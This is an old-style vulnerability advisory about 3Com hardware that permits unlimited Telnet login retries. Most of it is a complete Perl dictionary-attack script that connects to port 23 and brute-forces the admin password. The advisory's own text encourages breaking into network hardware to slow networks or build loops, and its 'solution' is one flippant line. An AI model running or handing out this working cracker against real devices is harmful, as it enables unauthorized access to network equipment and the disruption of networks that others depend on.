Vulnerability 3COM Affected 3COM Description "Siberian" found following. He noticed that there are infinity retries and no delay enabled at 3Com hardware, so he wrote this little Telnetcracker for this problem. He sent it to 3Com. This should work for must 3Com hardware with Telnet config enabled. It was tested it with a PS40 SuperStack II and it worked fine. Tips and suggestions welcome. It's really fun to crack into network hardware, imagine of all the nice features most devices support...enabling port, slowing down network, building loops... By the way, this one needs a dictionary file. #!/usr/bin/perl -w ######################################################## # # # 3Com Telnet Cracker v0.1b # # ------------------------- # # # # Telnet implementation arcording to RFC 854 # # # # written 2001 by Siberian [www.sentry-labs.com] # # # # Tested with: # # Active Perl (Windows NT) # # Perl 5.stable (Slackware 3.6 & 7.1) # # # # This Software is published under GPL v2 # # # # FOR EDUCATIONAL PURPOUSE ONLY! # # # # SRL can't be held responsible for any damgae caused # # by the software, direct or inderectly to anything # # or anyone. # # # ######################################################## use Socket; sub guesspass { $i=1; $userh = $userf; $userf = join '', $userf, chr(13), chr(10); recv(SOCK,$ol,1,0); while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){ recv(SOCK,$ol,1,0); } while(defined($passwd = <FILE1>)) { chop($passwd); print "."; while($i != 3) { if($ol eq "L"){ send(SOCK,$userf,0); } if($ol eq "P") { $passwd = join '', $passwd, chr(13), chr(10); send(SOCK,$passwd,0); } recv(SOCK,$ol,1,0); while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){ recv(SOCK,$ol,1,0); } if($ol eq "M") { print "\n\nPassword for $userh is $passwd\n"; exit 0; } $i++ } $i=1; } print "\n\nIt's sad but true, you failed.\n"; } print "\n3Com Hardware Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n\n"; print "Get the latest Version at www.sentry-labs.com\n\n"; $remote = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)"; $passf = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)"; $userf = shift || ($userf = "admin"); $iaddr = inet_aton($remote) or die "No target host computer found!"; $paddr = sockaddr_in(23, $iaddr); $prot = getprotobyname('tcp'); socket(SOCK, AF_INET, SOCK_STREAM, $prot) or die "socket: $!"; connect(SOCK, $paddr) || die "Can't connect to target host!"; open(FILE1, "$passf") || die "Can't open Password list!"; recv(SOCK,$ol,1,0); $bs = join '', chr(10),chr(13),chr(10); send(SOCK, $bs, 0); guesspass(); close(FILE1); close(SOCK); exit 0; Solution Well, password should be random and good one, right?